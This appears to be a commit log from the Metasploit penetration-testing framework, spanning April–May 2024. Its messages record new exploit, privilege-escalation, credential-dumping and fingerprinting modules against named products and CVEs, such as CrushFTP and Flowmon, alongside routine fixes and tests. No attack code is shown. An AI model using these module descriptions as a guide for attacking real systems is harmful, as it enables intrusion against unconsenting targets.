b4d02ffe46
Added CarotDAV and Windows version to documentation scenarios
2024-05-15 14:56:24 +01:00
Jacob
554c5c3cb4
Re-structured artifact enumeration option
...
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-05-15 14:52:58 +01:00
Jacob
4511bbfd17
Fixed documentation formatting
...
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-05-15 14:51:42 +01:00
The-Pink-Panther
5bc9dd2c5d
Merge remote-tracking branch 'origin/Halloy-Packrat-Module' into Halloy-Packrat-Module
2024-05-15 14:48:44 +01:00
-Pink-Panther
a250477c0e
Added Halloy and Windows version to documentation scenarios
2024-05-15 14:13:58 +01:00
Jacob
121d3ded85
Re-structured artifact enumeration option
...
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-05-15 14:07:48 +01:00
Jacob
8259db4756
Removed unused regex search
...
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-05-15 14:06:58 +01:00
Jacob
fb74915074
Fixed formatting issues
...
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-05-15 14:06:15 +01:00
dwelch-r7
f6e7aacfb5
Land #19182 , Disable the windows server 2022 test build
2024-05-14 18:49:53 +01:00
adfoster-r7
b9c09d7490
Fix windows build failures
2024-05-14 17:53:45 +01:00
h00die
d1739f32c2
review of chaos rat
2024-05-13 16:55:43 -04:00
Metasploit
9c4849e5bd
automatic module_metadata_base.json update
2024-05-13 14:58:09 -05:00
Spencer McIntyre
733c014223
Land #19115 , read/write registry key SD
...
Module to read/write registry key security descriptor remotely
2024-05-13 15:41:54 -04:00
Metasploit
613ec3c9d3
automatic module_metadata_base.json update
2024-05-13 13:53:16 -05:00
Jack Heysel
b1cd5b3476
Land #19132 , Add LDAPS Channel Binding
...
Add channel binding information to Metasploits NTLM and Kerberos
authentication for the LDAP protocol. This enables users to authenticate
to domain controllers where the hardened security configuration setting
is in place
2024-05-13 11:31:10 -07:00
Jack Heysel
216ffec555
Add Linux compatibility
2024-05-13 10:11:56 -07:00
adfoster-r7
4233822965
Land #19172 , Adds the features configuration to the debug command output
2024-05-13 12:55:44 +01:00
cgranleese-r7
7ee36ebc29
Adds a test for the new method
2024-05-13 11:19:37 +01:00
Christophe De La Fuente
f1ee10f486
Code review #2
2024-05-13 12:01:54 +02:00
Jack Heysel
576191b34f
beta commit
2024-05-10 09:01:58 -07:00
Metasploit
102f8d5476
automatic module_metadata_base.json update
2024-05-10 09:47:57 -05:00
Spencer McIntyre
80fdde5fdc
Land #19100 , Add Loadmaster sudo priv esc
...
Add Kemp Progress Loadmaster sudo abuse priv esc
2024-05-10 10:21:38 -04:00
bwatters
b28e263a2b
Update debug statements and add protection against bad die name
2024-05-10 08:54:23 -05:00
fufu
95ebf18691
Adding Arch parameter to dnn_cookie_deserialization_rce module
2024-05-09 23:09:03 +02:00
bwatters
948b18b08c
Add a check to the file delete
2024-05-09 15:52:29 -05:00
Metasploit
2a8b36d432
Bump version of framework to 6.4.9
2024-05-09 07:11:01 -05:00
Spencer McIntyre
2bf402fa52
Add channel binding spec
2024-05-08 16:40:46 -04:00
Spencer McIntyre
bef50de25a
Update error handling for some LDAP modules
2024-05-08 16:40:34 -04:00
Spencer McIntyre
66d5e89046
Update ChannelBinding to check the algorithm
2024-05-08 16:30:29 -04:00
Spencer McIntyre
69e35005ee
Add TLS channel binding for kerberos
2024-05-08 16:30:24 -04:00
Spencer McIntyre
cc3fd3bfa0
Update #build_gss_ap_req_checksum_value
...
This updates the #build_gss_ap_req_checksum_value method to allow
control over the flags and channel binding information.
2024-05-08 16:24:54 -04:00
Spencer McIntyre
8dabe17121
Pass the ticket storage setting
2024-05-08 16:24:54 -04:00
Spencer McIntyre
942d47bec5
Add TLS channel binding for NTLM
2024-05-08 16:24:48 -04:00
-Pink-Panther
1326849076
Added post module & documentation for CarotDAV FTP Client
2024-05-08 10:54:33 -04:00
cgranleese-r7
c938b10067
Adds the features configuration to the debug command output
2024-05-08 15:35:21 +01:00
Spencer McIntyre
a999ad49a0
Move the LDAP encryptors to their own files
2024-05-08 10:16:40 -04:00
-Pink-Panther
c5500a3337
Added post module & documentation for Sylpheed email Client
2024-05-08 10:09:49 -04:00
Jacob
47f1623d6c
Merge branch 'rapid7:master' into Halloy-Packrat-Module
2024-05-08 14:14:56 +01:00
adfoster-r7
1b9f24204a
Land #19159 , improve error handling for postgres platform/arch detection
2024-05-08 12:09:36 +01:00
-Pink-Panther
b3f2904e75
Re-arranged Author list
2024-05-07 16:22:51 -04:00
-Pink-Panther
ec04e62cce
Fixed typo in module documentation
2024-05-07 15:47:07 -04:00
-Pink-Panther
ceafa3761d
Added module documentation
2024-05-07 15:02:48 -04:00
Metasploit
82ce0a9726
automatic module_metadata_base.json update
2024-05-07 13:52:43 -05:00
adfoster-r7
2ea116efea
Land #19163 , Allow setting the RPORT option for smb_version
2024-05-07 19:36:12 +01:00
-Pink-Panther
37c068a66e
RuboCop Fixes
2024-05-07 13:25:52 -04:00
-Pink-Panther
ee2ca6a35b
Added post module for Halloy IRC Client
2024-05-07 12:51:25 -04:00
cgranleese-r7
3d044c4241
Fixes an issue were a regex mactch could have returned nil
2024-05-07 16:46:34 +01:00
Christophe De La Fuente
8c76143a9d
Land #19127 , Ldap signing
2024-05-07 17:28:36 +02:00
Spencer McIntyre
0863700f7a
Try 445/tcp before 139/tcp when scanning smb
2024-05-07 10:54:35 -04:00
Spencer McIntyre
88efba7cbb
Allow setting the RPORT option for smb_version
2024-05-07 10:17:15 -04:00
Metasploit
0b9d4654a4
automatic module_metadata_base.json update
2024-05-07 09:03:06 -05:00
Christophe De La Fuente
946cc3baf1
Land #19147 , Auxiliary module for CVE-2024-4040 - CrushFTP arbitrary file read
2024-05-07 15:44:24 +02:00
Spencer McIntyre
5523f13394
Fix a message that should refer to LDAP::Signing
2024-05-06 09:40:28 -04:00
Metasploit
cec01fb2c8
automatic module_metadata_base.json update
2024-05-06 08:30:55 -05:00
Spencer McIntyre
47c8d7252b
Land #18519 , Docker kernel module escape
2024-05-06 09:08:08 -04:00
h00die
0b5eaef1f7
jasmin_ransomware fix check methods
2024-05-04 16:06:48 -04:00
h00die
753ca1da61
reviews for jasmin ransomware panel
2024-05-04 15:56:11 -04:00
h00die
8240b869b9
reviews for jasmin ransomware panel
2024-05-04 15:56:11 -04:00
h00die
9c030b027a
fix tablein jasmin docs
2024-05-04 15:56:11 -04:00
h00die
24c689dfde
jasmin ransomware sqli and dir travers
2024-05-04 15:56:10 -04:00
h00die
d18700ec3b
jasmin ransomware sqli and dir travers
2024-05-04 15:56:10 -04:00
RadioLogic
fb62edbcb1
Merge pull request #1 from smcintyre-r7/pr/collab/18519
...
Added in suggestions by mcintyre
2024-05-03 22:27:40 -04:00
bwatters
b044bcab01
Add command payloads and checks for overwritten files
2024-05-03 13:06:16 -05:00
remmons-r7
5653ea5dfb
Implement peer review suggestions for documentation
...
Revise 'Options' section to format each option as a level-3 heading
Update to latest module console output in 'Scenarios'
2024-05-03 12:24:42 -05:00
remmons-r7
9ee3cfd057
Implement peer review suggestions
...
Added multiple API endpoint injection options
Added TARGETURI to support different reverse proxy configurations
Confirmed that different languages are supported
Removed RHOST 0.0.0.0 default
Set STORE_LOOT to optional and set default to "false"
Added more detail to every check and fail message
Moved print_status message after STORE_LOOT
2024-05-03 12:01:48 -05:00
Spencer McIntyre
69d603e6fc
Switch to an enum option for the signing
2024-05-03 10:27:10 -04:00
Metasploit
a0487348e5
automatic module_metadata_base.json update
2024-05-03 08:50:04 -05:00
adfoster-r7
4c84f8830f
Land #18907 , add mssql_version module
2024-05-03 14:33:35 +01:00
Christophe De La Fuente
69cbddde92
Land #19050 , Adobe ColdFusion Arbitrary File Read [CVE-2024-20767]
2024-05-03 15:15:08 +02:00
adfoster-r7
a9960a506c
Land #19125 , updates mssql platform/arch fingerprinting to be more resilient
2024-05-03 13:58:06 +01:00
adfoster-r7
860da5f2b4
Land #19158 , reimplement password_spray into login modules
2024-05-03 13:39:36 +01:00
Zach Goldman
6547fdb4c4
adds pattern to catch other arch and platform values
2024-05-03 07:05:35 -05:00
cgranleese-r7
bb473f4004
Reimplement password_spray into login modules
2024-05-03 13:00:24 +01:00
Zach Goldman
c382066be8
cache prelogin packet
2024-05-02 12:51:33 -05:00
Jack Heysel
e3d7dce4a9
Updated res.body parsing, responded to comments
2024-05-02 09:47:22 -07:00
remmons-r7
7f433bfadb
Implement peer review suggestion to move IOC comments up
2024-05-02 11:44:39 -05:00
remmons-r7
6c91ca37b6
Implement peer review suggestion to add CrushFTP10.zip SHA256
2024-05-02 11:42:49 -05:00
remmons-r7
168eb9e14d
Implement peer review suggestion to remove unnecessary STORE_LOOT check
...
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com >
2024-05-02 11:13:54 -05:00
remmons-r7
9e8fe15e48
Implement peer review suggestion for more detailed fail_with message
...
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com >
2024-05-02 11:11:04 -05:00
adfoster-r7
fd10f4d295
Land #19156 , Fixes password_spray not using additional_privates and default username
2024-05-02 16:20:10 +01:00
cgranleese-r7
d105ae10ff
Fixes some password_spray issues
2024-05-02 15:43:07 +01:00
Metasploit
4c7f1e6520
Bump version of framework to 6.4.8
2024-05-02 03:37:55 -05:00
Metasploit
bd767a9279
automatic module_metadata_base.json update
2024-05-01 16:26:41 -05:00
Spencer McIntyre
1bf721b9d5
Land #19152 , Fix apache_normalize_path_rce check
...
Fix apache_normalize_path_rce check method
2024-05-01 17:10:23 -04:00
h00die
80b4cb7721
remove moved files
2024-05-01 16:08:57 -04:00
adfoster-r7
5e1dc05f09
Fix apache_normalize_path_rce check method
2024-05-01 20:01:38 +01:00
Spencer McIntyre
ca669d8f08
Update docs to reflect changes
2024-05-01 13:45:20 -04:00
Spencer McIntyre
c2bf9ead06
Add support for redhat based containers
...
Containers such as Fedora use a different directory for the kernel
headers.
2024-05-01 13:30:16 -04:00
DaveYesland
c2a561630d
Add local privesc module for Flowmon
2024-05-01 09:07:34 -07:00
DaveYesland
a7e97e50ad
Add module for flowmon cmd injection CVE-2024-2389
2024-05-01 08:42:55 -07:00
Spencer McIntyre
2cb0e44740
Don't change the working directory
2024-05-01 10:35:24 -04:00
Metasploit
2dce73833f
automatic module_metadata_base.json update
2024-05-01 08:45:48 -05:00
adfoster-r7
59a3839be8
Land #19137 , nameservers from resolv.conf must be IP addresses
2024-05-01 14:28:38 +01:00
Spencer McIntyre
a98554a1f4
Land #19048 , Enable inline credentials dump
...
Windows Secrets Dump: Enable inline credentials dump
2024-05-01 09:05:40 -04:00
Spencer McIntyre
67dc01f124
Remove the unnecessary payload space
2024-04-30 16:29:43 -04:00
adfoster-r7
fef9024c5a
Land #19148 , Update pcaprub dependency
2024-04-30 21:18:34 +01:00
adfoster-r7
27dd14bb64
Update pcaprub dependency
2024-04-30 20:48:24 +01:00
Christophe De La Fuente
6849e909d0
Code review
...
- remove `#auxiliary_commands`, it is not necessary anymore
- move the connection logic to a separate method
- make sure the connection to Winreg is setup when using direct `read`
and `write` commands
- fix wrong method call to `save_to_file`
2024-04-30 20:57:32 +02:00
Christophe De La Fuente
91be90c43e
Add registry_security_descriptor module and documentation
2024-04-30 20:57:32 +02:00
Christophe De La Fuente
52001bf7d4
Bump ruby_smb to version 3.3.7
...
- This will bring in the GetKeySecurity and SetKeySecurity MS-RRP structures
2024-04-30 20:54:15 +02:00
Christophe De La Fuente
9079ce331b
Remove call to each_key on users array, since it is not a Hash
2024-04-30 20:52:23 +02:00
remmons-r7
de82fdac50
Remove trailing whitespaces
2024-04-30 12:33:26 -05:00
remmons-r7
8b1b940f7c
Fixing a spacing issue that was introduced, as well as a couple msftidy issues
2024-04-30 12:19:16 -05:00
remmons-r7
5765fe8197
Implement fixes for msftidy issues
...
C: 21: 11: [Correctable] Layout/ModuleDescriptionIndentation: Module descriptions should be properly aligned to the 'Description' key, and within %q{ ... }
C: 67: 54: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
C: 81: 18: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
C: 87: 40: [Correctable] Style/InverseMethods: Use !~ instead of inverting =~.
W: 92: 50: [Correctable] Lint/SafeNavigationChain: Do not chain ordinary method call after safe navigation operator.
W:110: 63: [Correctable] Lint/SafeNavigationChain: Do not chain ordinary method call after safe navigation operator.
W:127: 54: [Correctable] Lint/RedundantStringCoercion: Redundant use of Object#to_s in interpolation.
C:143: 7: [Correctable] Layout/FirstHashElementIndentation: Use 2 spaces for indentation in a hash, relative to the start of the line where the left curly brace is.
C:146: 20: [Correctable] Layout/SpaceInsideHashLiteralBraces: Space inside { missing.
C:146: 44: [Correctable] Layout/SpaceInsideHashLiteralBraces: Space inside } missing.
C:152: 18: [Correctable] Style/RedundantInterpolation: Prefer to_s over string interpolation.
C:152: 32: [Correctable] Style/SlicingWithRange: Prefer [-4..] over [-4..-1].
C:153: 9: [Correctable] Layout/FirstHashElementIndentation: Indent the right brace the same as the start of the line where the left brace is.
2024-04-30 12:09:28 -05:00
remmons-r7
e19ae7c3d1
Remove space before file output
2024-04-30 11:52:07 -05:00
remmons-r7
4e81de2968
Add CVE-2024-4040 exploit module
2024-04-30 11:43:37 -05:00
remmons-r7
d7b63679c9
Add documentation markdown for crushftp_fileread_cve_2024_4040
2024-04-30 11:24:43 -05:00
Metasploit
d6b45658e0
automatic module_metadata_base.json update
2024-04-29 17:55:45 -05:00
Spencer McIntyre
434186200a
Land #19141 , Apache RocketMQ & ActiveMQ fixes
2024-04-29 18:33:47 -04:00
jheysel-r7
6055d8a005
Apply suggestions from code review
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-04-29 17:37:49 -04:00
bwatters
742326ae90
Actually add script contents
2024-04-29 15:28:34 -05:00
bwatters
d94971598b
Add documentation and fix some debug prints
2024-04-29 15:28:34 -05:00
bwatters
8a08f6a083
Land #19075 , Modularise the Softing login code
...
Merge branch 'land-19075' into upstream-master
2024-04-29 14:47:44 -05:00
Jack Heysel
6c74d14bb7
Tested attempt to fix rspec
2024-04-29 08:54:57 -07:00
RadioLogic
53ac5118cd
Added report host to virtualization check
2024-04-26 21:58:43 -04:00
RadioLogic
15a9b59ccf
Made case statements more readable
2024-04-26 21:55:01 -04:00
RadioLogic
b51d1b9017
Made shared function with checkcontainer
2024-04-26 21:32:20 -04:00
Metasploit
518aafb1f1
automatic module_metadata_base.json update
2024-04-26 18:37:25 -05:00
bwatters
364d491af7
Land #18972 , Progress LoadMaster unauthenticated command injection module CVE-2024-1212
...
Merge branch 'land-18972' into upstream-master
2024-04-26 18:18:40 -05:00
bwatters
02c31159ab
Add vulnerable versions and fix indention
2024-04-26 17:36:50 -05:00
Jack Heysel
f5f1deaf5b
Untested attempt to fix spec
2024-04-26 14:55:45 -07:00
Jack Heysel
3b57fbf052
ActiveMQ fixes
2024-04-26 14:25:16 -07:00
Jack Heysel
429eaff5ca
RocketMQ fixes
2024-04-26 14:24:08 -07:00
RadioLogic
7dabfb15be
Ran rubocop again
2024-04-26 14:52:14 -04:00
h00die
45312a506d
further x11 revisions
2024-04-26 14:49:22 -04:00
RadioLogic
ca9c60badb
Made usermodhelper wait for exec
2024-04-26 14:43:39 -04:00
RadioLogic
81aa572e15
Removed uneeded cd in cleanup
2024-04-26 14:15:24 -04:00
RadioLogic
852f888cc8
Added payload limits
2024-04-26 14:06:32 -04:00
RadioLogic
5adc91b7d5
Reverted back to using relative pathing due to kernel make scripts
2024-04-26 13:46:17 -04:00
Christophe De La Fuente
4f6e2bcd22
Code review
2024-04-26 18:47:42 +02:00
Christophe De La Fuente
4794844b67
Update the documentation
2024-04-26 18:44:05 +02:00
Christophe De La Fuente
1294ed0bbb
Add inline technique to dump SAM hashes, LSA secrets and cached hashes
2024-04-26 18:44:05 +02:00
Jack Heysel
c0e589dcf4
Updated single quotes
2024-04-26 09:08:08 -07:00
Jack Heysel
bf240b7e43
Responded to comments
2024-04-26 09:04:33 -07:00
Metasploit
a6cf1cd414
automatic module_metadata_base.json update
2024-04-26 07:52:01 -05:00
adfoster-r7
7e2e3eeab3
Land #19138,fix recursive call to ldap_open
2024-04-26 13:35:30 +01:00
Dean Welch
1c8a4706d7
Fix recursive call to ldap_open
2024-04-26 12:33:43 +01:00
Spencer McIntyre
cf6d324832
Nameservers from resolv.conf must be IP addresses
...
Fixes an infinite recursion error where Metasploit would attempt to
resolve a nameserver specified as a hostname in /etc/resolv.conf while
initializing.
Values for the namserver key in the resolv.conf file must be IP
addresses per the man page while the Resolver class in theory allows
them to be added by hostname however an existing one must be defined by
which it will be resolved.
This notably prevents IPv6 addresses with a scope ID from being allowed
in Ruby versions < 3.1.
2024-04-25 16:21:04 -04:00
h00die
a7b428a6d2
doc update
2024-04-25 15:50:40 -04:00
h00die
83d1dcb1d4
move x11 to be more modular, forgot to grab spec files :(
2024-04-25 15:48:14 -04:00
Metasploit
aef3cc546b
automatic module_metadata_base.json update
2024-04-25 10:10:09 -05:00
Simon Janusz
76d7fe8dbd
Land #19095 , Refactor smb_enumusers
2024-04-25 15:45:23 +01:00
dwelch-r7
cd40f95f05
Land #19134 , Downgrade unf ext
2024-04-25 15:25:05 +01:00
adfoster-r7
c1e5c7a8bf
Downgrade unf_ext
2024-04-25 15:08:31 +01:00
Spencer McIntyre
d6317923f6
Bump ruby_smb to 3.3.6
...
This pulls in the changes from rapid7/ruby_smb#266 which adds
SamrQueryInformationDomain support.
2024-04-25 09:41:48 -04:00
Metasploit
b607c70611
Bump version of framework to 6.4.7
2024-04-25 03:35:58 -05:00
h00die
9ed9ea8c38
add event_dependent to northstar_c2
2024-04-24 16:54:58 -04:00
h00die
dd5a8c629f
northstar_c2 adjustments
2024-04-24 16:54:02 -04:00
h00die
19af4ae4e6
mermaid flow chart
2024-04-24 16:54:02 -04:00
h00die
9fb217fb59
northstar c2 exploit
2024-04-24 16:54:02 -04:00
h00die
7f02902ba1
add event_dependent to chaos_xss
2024-04-24 16:53:24 -04:00
h00die
512da4bc45
chaos rat xss to rce
2024-04-24 16:51:58 -04:00
h00die
417e7c1302
x11 progress
2024-04-24 16:46:37 -04:00
Spencer McIntyre
1c8d62abc1
Land #19129 , Add missing '-S' to cmd_notes
2024-04-24 15:57:33 -04:00
Metasploit
1e4e62dc43
automatic module_metadata_base.json update
2024-04-24 14:29:51 -05:00
Jack Heysel
aea95c052e
Land #18723 , Improve Gitlab fingerprinting
...
A webpage exists that can be reached without authentication that
contains a hash that can be used to determine the approximate version of
gitlab running on the endpoint. This PR adds enhances our current GitLab
fingerprinting capabilities to include the aforementioned technique.
2024-04-24 12:13:15 -07:00
Zach Goldman
04c5d8b924
Update modules/auxiliary/scanner/mssql/mssql_version.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-04-24 15:06:37 -04:00
Zach Goldman
d8c7a26565
add unit test, clean up data hash
2024-04-24 15:06:36 -04:00
Zach Goldman
d0a714d1e8
refactor packet parsing code
2024-04-24 15:06:36 -04:00
Zach Goldman
ae091bf17d
add encryption detection, reporting to mssql_version
2024-04-24 15:06:36 -04:00
Zach Goldman
6fd8c8b903
add session support, dry out code, update descriptions to be more specific
2024-04-24 15:06:36 -04:00
Zach Goldman
3897b49ca6
add mssql_version module
2024-04-24 15:06:36 -04:00
Jack Heysel
bc4a532cd7
Changed format of GITLAB_CSS_MAP
2024-04-24 11:38:22 -07:00
Noam Rathaus
cadda6f1a3
Fix rspec for cmd_notes
2024-04-24 20:46:32 +03:00
Jack Heysel
8b48d3d056
Print RPORT as well as IP when printing version
2024-04-24 10:20:59 -07:00
Metasploit
e6fb1789f4
automatic module_metadata_base.json update
2024-04-24 12:15:44 -05:00
Jack Heysel
bd2b1e5f00
Removed redundant use of Object#to_s in interpolation
2024-04-24 10:09:20 -07:00
Jack Heysel
f018295509
Ensure range of Rex::Version objects are always returned
2024-04-24 10:00:16 -07:00
adfoster-r7
e5cf357f9e
Land #19078 , ldap acceptance tests
2024-04-24 17:59:24 +01:00
Dean Welch
33ffc14e6b
Use samba ad container for ldap
2024-04-24 11:38:41 +01:00
Noam Rathaus
99c56c5410
Add missing '-S'
2024-04-24 12:24:01 +03:00
Ashley Donaldson
6d915dbb55
Fix unit tests
2024-04-24 15:54:57 +10:00
Ashley Donaldson
631e4e34db
Update LDAP doco with current options
2024-04-24 15:40:11 +10:00
Ashley Donaldson
68966b86f1
Give warning on invalid config (SSL and REQUIRE_SIGNING both set to true)
2024-04-24 15:05:03 +10:00
Ashley Donaldson
ec44cb1e2e
Fix interface of block cipher base
2024-04-24 14:01:45 +10:00
Ashley Donaldson
a4b3c27e28
Provide more meaningful error message when signing is required
2024-04-24 13:37:27 +10:00
Ashley Donaldson
b5f4dfae71
Make encrypting/signing an option
2024-04-24 13:24:05 +10:00
Ashley Donaldson
9aead31bb9
Support encrypted LDAP (ldap signing) over Kerberos and NTLM
2024-04-24 12:56:06 +10:00
RadioLogic
ecb70eeb8c
Rubocop ran on file
2024-04-23 18:53:16 -04:00
RadioLogic
f8f7eb919f
Removed all use of path traversal for absolute paths
2024-04-23 18:48:33 -04:00
RadioLogic
1c8c91096f
Removed port being in documentation as it made no sense
2024-04-23 18:47:30 -04:00
jvoisin
5ff05b7cec
Add more fingerprints
2024-04-24 00:12:01 +02:00
Metasploit
71ce807300
automatic module_metadata_base.json update
2024-04-23 16:47:00 -05:00
adfoster-r7
718cc0fff4
Land #19122 , add EVENT_DEPENDENT to vcenter vmon priv esc
2024-04-23 22:29:53 +01:00
RadioLogic
361fe34167
Update modules/exploits/linux/local/docker_privileged_container_kernel_escape.rb
...
Used rex to add in payload
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-04-23 17:29:07 -04:00
RadioLogic
bee5306ac9
Added suggestions by rubymine
2024-04-23 17:18:30 -04:00
h00die
0ba2880352
fix spec for event-dependent
2024-04-23 16:49:23 -04:00
Metasploit
01f6ebfd74
automatic module_metadata_base.json update
2024-04-23 13:44:39 -05:00
bwatters
ed8a9e2831
Land #19124 , Fixed output of db_import command in spec
...
Merge branch 'land-19124' into upstream-master
2024-04-23 13:17:10 -05:00
Zach Goldman
26a108aadc
Land #19046 , Apache Solr Backup Restore RCE [CVE-2023-50386]
2024-04-23 14:08:33 -04:00
Jack Heysel
83df7bee65
Fixed output of db_import command in spec
2024-04-23 08:28:06 -07:00
Jack Heysel
e3625307b3
Land #18914 , Add OpenVAS import improvement
...
This PR adds functionality so that CVE and URL references will be
imported from an OpenVAS XML report by default. DNF-CERT and CERT-BUND
references can also be collected by sending additional flags to the
db_import command
2024-04-22 18:11:33 -07:00
Dave Yesland
a36244073f
Merge pull request #1 from bwatters-r7/update-18972
...
Remove Priv Esc to add it to another module and update it to only run…
2024-04-22 17:53:48 -07:00
Dave Yesland
c10bde97ff
Merge branch 'rapid7:master' into module/progress_kemp_loadmaster_unauth_cmd_injection
2024-04-22 17:53:32 -07:00
Julien Voisin
0b1a4e2a99
Apply suggestions from code review
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-04-23 01:05:57 +02:00
jvoisin
e5bb593607
Improve how we fingerprint Gitlab versions
...
Since I was the one suggesting it in #18716 , I kinda volunteered to implement
it. This improvement is based on [Censys's blogpost](https://censys.com/cve-2021-22205-it-was-a-gitlab-smash/ )
on the topic, making use of the `/assets/application-….css` files that have
a unique name per gitlab versions.
The fingerprints were acquired with this bash script:
```bash
assetdir="/opt/gitlab/embedded/service/gitlab-rails/public/assets"
tags=$(curl "https://hub.docker.com/v2/repositories/gitlab/gitlab-ce/tags?page_size=100 " | jq -r '.results[].name')
for tag in $tags; do
filename=$(docker run --quiet --rm -it --entrypoint "" gitlab/gitlab-ce:$tag ls $assetdir|egrep '^application-.*\.css' | grep -v \.gz | cut -d' ' -f1)
echo $tag,$filename
done
```
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com >
2024-04-23 01:05:57 +02:00
h00die
3b2d669702
add EVENT_DEPENDENT to spec
2024-04-22 15:38:56 -04:00
h00die
53c2bf2e74
add EVENT_DEPENDENT to vcenter vmon priv esc
2024-04-22 15:12:27 -04:00
h00die
7a27c0f010
some review on x11
2024-04-22 15:07:57 -04:00
Spencer McIntyre
a3e3eb9e44
Re-add session support to the smb_enumusers module
2024-04-22 14:18:26 -04:00
Spencer McIntyre
eefa762c15
Put username reporting back in
2024-04-22 13:45:20 -04:00
Spencer McIntyre
837e503170
Refactor the MsSamr mixin to split it out
2024-04-22 13:45:20 -04:00
Spencer McIntyre
a008288e05
Readd support for multiple ports
2024-04-22 13:45:20 -04:00
Spencer McIntyre
eec72b8f54
Start refactoring smb_enumusers to use RubySMB
2024-04-22 13:45:15 -04:00
cgranleese-r7
a554e5251c
Land #19106 , Routine Gem dependencies update
2024-04-22 11:38:57 +01:00
Metasploit
6397cbe6bf
automatic module_metadata_base.json update
2024-04-22 04:43:47 -05:00
cgranleese-r7
4bbe2c306c
Land #19079 , Fix PASSWORD_SPRAY being ignored for LDAP (and potentially other modules)
2024-04-22 10:22:51 +01:00
Noam Rathaus
533a631ee4
Fix suggestions given by cgranleese-r7
2024-04-21 11:51:21 +03:00
Metasploit
a1b9941a8c
automatic module_metadata_base.json update
2024-04-19 16:38:22 -05:00
bwatters
c6fc5ad2e1
Land #19114 , Better enforce types to prevent nil values from causing stack traces
...
Merge branch 'land-19114' into upstream-master
2024-04-19 16:21:22 -05:00
Spencer McIntyre
5675c59690
Fix blank values for LDAP NTLM auth
2024-04-19 16:30:29 -04:00
Spencer McIntyre
f3b426cc73
Fix usages of #empty? too
...
Fix usages of #empty? in ldap_esc_vulnerable_cert_finder too
2024-04-19 15:49:36 -04:00
Metasploit
672d3ee26e
automatic module_metadata_base.json update
2024-04-19 14:35:28 -05:00
Jack Heysel
b8675f0fd7
Land #19005 , Add Gambio Webshop Unauth RCE
...
A Remote Code Execution vulnerability in Gambio online webshop version
4.9.2.0 and lower allows remote attackers to run arbitrary commands via
unauthenticated HTTP POST request
2024-04-19 12:18:17 -07:00
Zach Goldman
488653d942
Land #19082 , FortiNet FortiClient EMS SQLi to RCE [CVE-2023-48788]
2024-04-19 15:03:22 -04:00
Metasploit
dce1a0b4d0
automatic module_metadata_base.json update
2024-04-19 13:10:30 -05:00
bwatters
4733d1dc04
Land #19101 , Exploit module for CVE-2024-4300 - Palo Alto Networks PAN-OS
...
Merge branch 'land-19101' into upstream-master
2024-04-19 12:49:41 -05:00
jheysel-r7
3205fe9e63
Apply suggestions from code review
2024-04-19 13:44:18 -04:00
Spencer McIntyre
3697d4cb77
Land #18956 , Rancher CVE-2021-36782
...
Rancher Authenticated API Credential Exposure (CVE-2021-36782)
2024-04-19 13:27:30 -04:00
Spencer McIntyre
d93b97d7c4
Add rancher installation docs
2024-04-19 12:55:46 -04:00
remmons-r7
2ad13ac836
Added note about shell from a different IP than RHOST IP
2024-04-19 11:45:56 -05:00
Metasploit
42a14ef6bf
Bump version of framework to 6.4.6
2024-04-19 11:34:11 -05:00
Simon Janusz
248291ae16
Land #19113 , Revert "Sql sessions have correct history manager"
2024-04-19 17:11:41 +01:00
Metasploit
4562af58fd
automatic module_metadata_base.json update
2024-04-19 10:49:02 -05:00
cgranleese-r7
aa3181cc26
Land #19112 , add arch and platform detection for mssql sessions
2024-04-19 16:33:28 +01:00
Zach Goldman
939f4337b0
Land #19089 , Fix crash in exim4_deliver_message_priv_esc
2024-04-19 11:05:23 -04:00
Imran E. Dawoodjee
8d6a20634f
Attempt to improve file cleanup functionality
2024-04-19 23:05:02 +08:00
Metasploit
91533a8c08
automatic module_metadata_base.json update
2024-04-19 10:03:07 -05:00
Imran E. Dawoodjee
afd4b8af2e
Remove x86 things, include AutoCheck
2024-04-19 22:49:40 +08:00
adfoster-r7
cff93390c7
Land #19080 , Add arch/platform detection for Postgres
2024-04-19 15:46:58 +01:00
Zach Goldman
0c6af95164
adjust mysql logic for unknown platform arch
2024-04-19 09:23:04 -05:00
Zach Goldman
5c89b6aa0e
add arch and platform detection for mssql sessions
2024-04-19 08:54:27 -05:00
remmons-r7
4f3ee3f78a
Incorporate documentation wording change from suggestion
...
Co-authored-by: Brendan <bwatters@rapid7.com >
2024-04-19 08:50:20 -05:00
adfoster-r7
92592f979b
Land #19105 , add more mssql datatypes
2024-04-19 14:47:29 +01:00
Zach Goldman
b4dccdfcd6
add more datatypes
2024-04-19 08:38:22 -05:00
Metasploit
b30ff7df3c
automatic module_metadata_base.json update
2024-04-19 08:33:51 -05:00
adfoster-r7
376bdefefb
Land #19054 , Add NText column parsing to MSSQL
2024-04-19 14:17:50 +01:00
Spencer McIntyre
f5046d0c2a
Fix the return value of a few methods
2024-04-19 09:06:48 -04:00
adfoster-r7
7e25088615
Land #19066 , Add smb acceptance tests
2024-04-19 13:38:04 +01:00
sjanusz-r7
bf50da5e8f
Add SMB acceptance tests
2024-04-19 12:49:44 +01:00
adfoster-r7
b488cebeba
Revert "Sql sessions have correct history manager"
2024-04-19 11:59:30 +01:00
cgranleese-r7
aeafa4a756
Land #19088 , Add docs for running and writing Metasploit's unit tests
2024-04-19 11:55:20 +01:00
adfoster-r7
adf8a8be5f
Land #19086 , update Metasploit RPC to expose module default_options
2024-04-19 11:35:44 +01:00
cgranleese-r7
b83f2e3e6c
Updates handling of arm for both PostgreSQL and MySQL
2024-04-19 11:11:12 +01:00
Noam Rathaus
8526938946
Change the order to make the test work with the yield
